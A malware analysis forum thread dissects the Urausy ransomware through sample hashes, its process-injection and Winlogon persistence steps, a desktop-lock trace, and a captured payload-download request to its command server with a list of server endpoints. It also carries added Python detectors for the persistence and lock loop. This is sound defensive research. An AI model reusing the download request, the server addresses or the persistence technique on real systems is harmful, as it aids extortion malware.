Win32/Urausy (aka "WinLocker")

Forum for analysis and discussion about malware.
Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Win32/Urausy (aka "WinLocker")

Post by Win32:Virut » Fri Aug 17, 2012 10:27 am

Urausy

https://www.botnets.fr/index.php/Urausy

MD5: B88FD69B53A6E4587D9E95A0C6061141

nullptr
Posts: 210
Joined: Sun Mar 14, 2010 6:35 am

Re: Trojan Ransom / FakePoliceAlert

Post by nullptr » Sun Sep 02, 2012 12:44 pm

Urausy

MD5: 74203CB3EE8722B8DE95CC2236C06F3E
vt - https://www.virustotal.com/file/59abd45 ... /analysis/

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Win32:Virut » Sun Sep 16, 2012 12:09 pm

5x Urausy

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

TrojanDownloader:Win32/Urausy.A

Post by Win32:Virut » Thu Oct 11, 2012 4:21 pm

Hi,

I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2

Thanks

rkhunter
Posts: 1150
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation

Re: Malware Requests, part 2

Post by rkhunter » Sat Oct 13, 2012 10:32 am

Win32:Virut wrote:
Hi,

I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2

Thanks
SHA256: e19c8f1ea80d6cf9d3348a07c7428bbcdfc66ea5a192f63e22a8e29cfda5aaf0
SHA1: fae01f374d5dde3271306aca91f842f9f0b17d75
MD5: 0efd95e4d3502e20b7120685050abae2
File size: 44032 bytes

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Win32:Virut » Sat Nov 17, 2012 3:44 pm

Urausy


rinn
Posts: 91
Joined: Thu Nov 15, 2012 6:14 am
Location: Japan

Re: Trojan Ransom / FakePoliceAlert

Post by rinn » Sat Nov 17, 2012 6:09 pm

Hi.

This is an interesting ransom. It is written in fasm 1.7 and this makes it something special. Usually ransomware are Delphi applications written by people with no programming skills. This one is different. It is still simple compared to famous trojans, but there are some features which make it special.

It has a three-stage startup.

In the first stage it registers the window class "SetupFrameClass", creates a window called "Setup" and waits a few milliseconds. After the wnd_procedure (see @004012D0) assumes control, it calls specially prepared code (see @004013A0) responsible for the second stage and further trojan installation.

Second stage: memory injection into explorer.exe. After this code activates, it creates a new special desktop named wLockDesktop, starts a zombified copy of svchost.exe with (again) injected trojan code and the initial process desktop value set to wLockDesktop. Then execution transfers to this zombified svchost.exe.

The third stage is responsible for setting the autorun registry key

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell with value explorer.exe,%userprofile%\Application Data\msconfig.dat

<--- this is the ransom itself (the copy file routine also takes place in this stage).

The ransom (code running inside svchost.exe) ensures that wLockDesktop is the current active desktop by periodically switching to it. This was made to defeat Sysinternals Desktops and similar tools.

Decrypted and working dropper is attached. Password "infected" without quotes.

Best Regards,
-rin
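A persistence check for the Winlogon Shell value described above, added here as an example; it is not code from rinn's post or from the sample. It audits a Shell string (the sample below is the value reported in the post) for extra programs, user-writable launch paths and data-file extensions, and only reads the live registry when run on Windows.

```python
import re
from typing import List, Tuple

# Value reported in the analysis above: Explorer followed by the ransom copy.
# The string is reconstructed from the post for offline testing.
SAMPLE_SHELL_VALUE = r"explorer.exe,%userprofile%\Application Data\msconfig.dat"

# Traits that make a Shell entry suspicious: user-writable locations,
# non-executable extensions used as a program (msconfig.dat in this case),
# or simply any program besides the default explorer.exe.
USER_WRITABLE = re.compile(r"%(userprofile|appdata|localappdata|temp|tmp)%", re.I)
DATA_EXTENSIONS = (".dat", ".tmp", ".txt", ".log")

def parse_shell_value(value: str) -> List[str]:
    """Split the Winlogon Shell value into its comma-separated programs."""
    return [entry.strip().strip('"') for entry in value.split(",") if entry.strip()]

def audit_shell_value(value: str) -> List[Tuple[str, str]]:
    """Return (entry, reason) pairs for every entry that is not plain explorer.exe."""
    findings = []
    for entry in parse_shell_value(value):
        if entry.lower() == "explorer.exe":
            continue  # the default, benign value
        if USER_WRITABLE.search(entry):
            findings.append((entry, "launches from a user-writable location"))
        elif entry.lower().endswith(DATA_EXTENSIONS):
            findings.append((entry, "non-executable extension used as a program"))
        else:
            findings.append((entry, "extra program appended to Shell"))
    return findings

def read_current_user_shell() -> str:
    """On Windows, read the HKCU Winlogon Shell value; elsewhere use the sample."""
    try:
        import winreg  # only available on Windows
    except ImportError:
        return SAMPLE_SHELL_VALUE
    key_path = r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path) as key:
            value, _ = winreg.QueryValueEx(key, "Shell")
            return value
    except OSError:
        return ""  # value absent: Winlogon falls back to the HKLM default

if __name__ == "__main__":
    for entry, reason in audit_shell_value(read_current_user_shell()):
        print(f"suspicious Shell entry: {entry!r} ({reason})")
```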

EP_X0FF
Global Moderator
Posts: 4775
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: Trojan:Win32/Urausy (aka "WinLocker")

Post by EP_X0FF » Sun Nov 18, 2012 7:00 am

Switching to a different desktop is set in an infinite loop with a very small delay.

Code:

00000039	273.98556519	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000040	274.08596802	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000041	274.18600464	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000042	274.28622437	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000043	274.38613892	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000044	274.48648071	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000045	274.59146118	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000046	274.68685913	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000047	274.78668213	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000048	274.90359497	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000049	275.01293945	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000050	275.10397339	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000051	275.20385742	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000052	275.32345581	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000053	275.43780518	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000054	275.52349854	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000055	275.62338257	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000056	275.72372437	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
Winlock window hierarchy (different run, that's why the PID is different).


Uses an embedded IE window to display HTML-based content.

The payload is requested in an encrypted container; a special marker is prepended to the request string: "55565755".
GET /555657550B8836F821F3BF69B40E8541B9BB830D10E570A1C1B HTTP/1.1
User-Agent: Our_Agent
Host: hhrbn.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 18 Nov 2012 01:11:11 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Cache-Control: public
Content-Disposition: attachment; filename=32721
Content-Transfer-Encoding: binary
Content-Length: 83722
It is decrypted into the %temp% folder and then executed by the ransom from the embedded full-screen IE window. Ransom page + all graphics/CSS attached.
Ring0 - the source of inspiration
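Detection logic for the desktop-switch loop shown in EP_X0FF's trace, added here as an example and not part of the post. It parses lines in that trace's layout (sequence, seconds, message), groups denied switch attempts per thread and target desktop, and flags any thread that retries at a short, steady interval; the first five sample lines are copied from the trace above, the last one is constructed as a benign control.

```python
import re
from collections import defaultdict
from statistics import median
from typing import Dict, List, Tuple

# Sample trace: five lines from the post above plus one constructed single
# attempt (pid 900) that should not be flagged.
SAMPLE_TRACE = """\
00000039\t273.98556519\t[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000040\t274.08596802\t[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000041\t274.18600464\t[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000042\t274.28622437\t[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000043\t274.38613892\t[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000050\t300.10000000\t[900] pid: 900 tid: 20 Attempt to switch current desktop, target Winlogon - request denied
"""

LINE_RE = re.compile(
    r"^(?P<seq>\d+)\t(?P<ts>\d+\.\d+)\t\[\d+\] pid: (?P<pid>\d+) tid: (?P<tid>\d+) "
    r"Attempt to switch current desktop, target (?P<target>\S+) - request denied"
)

def parse_trace(text: str) -> List[Tuple[int, int, str, float]]:
    """Return (pid, tid, target desktop, timestamp in seconds) per matching line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((int(m["pid"]), int(m["tid"]), m["target"], float(m["ts"])))
    return events

def find_switch_loops(events, min_attempts=5, max_median_interval=0.5):
    """Flag (pid, tid, target) tuples that retry a desktop switch rapidly and repeatedly."""
    by_thread: Dict[Tuple[int, int, str], List[float]] = defaultdict(list)
    for pid, tid, target, ts in events:
        by_thread[(pid, tid, target)].append(ts)
    loops = {}
    for key, stamps in by_thread.items():
        if len(stamps) < min_attempts:
            continue  # a handful of attempts is normal for legitimate tools
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        interval = median(gaps)  # median resists a single long pause
        if interval <= max_median_interval:
            loops[key] = {"attempts": len(stamps), "median_interval_s": round(interval, 3)}
    return loops

if __name__ == "__main__":
    for key, info in find_switch_loops(parse_trace(SAMPLE_TRACE)).items():
        print(f"pid {key[0]} tid {key[1]} loops on desktop {key[2]!r}: {info}")
```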

Xylitol
Global Moderator
Posts: 1652
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Re: Trojan:Win32/Urausy (aka "WinLocker")

Post by Xylitol » Sun Nov 18, 2012 10:43 am

EP_X0FF wrote:
Host: hhrbn.ru

Not at home this weekend so I can't attack/disassemble stuff, but found this

Code:

rnmbe.su/hhrbn.ru
hxxp://46.37.162.28:80/user/login/ « auth service »
hxxp://hhrbn.ru:80/data.php
hxxp://hhrbn.ru:80/config.php
hxxp://hhrbn.ru:80/gateway.php
hxxp://hhrbn.ru:80/includes/rc4.php
hxxp://hhrbn.ru:80/includes/mysql.php
hxxp://hhrbn.ru:80/includes/functions.php
hxxp://hhrbn.ru:80/config/
hxxp://hhrbn.ru:80/cache/
mysql.php returns "could not find driver"; the rest are standard HTTP 200/Length 0, probably need parameters.

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan:Win32/Urausy (aka "WinLocker")

Post by Win32:Virut » Sun Nov 18, 2012 11:59 am

New Urausy
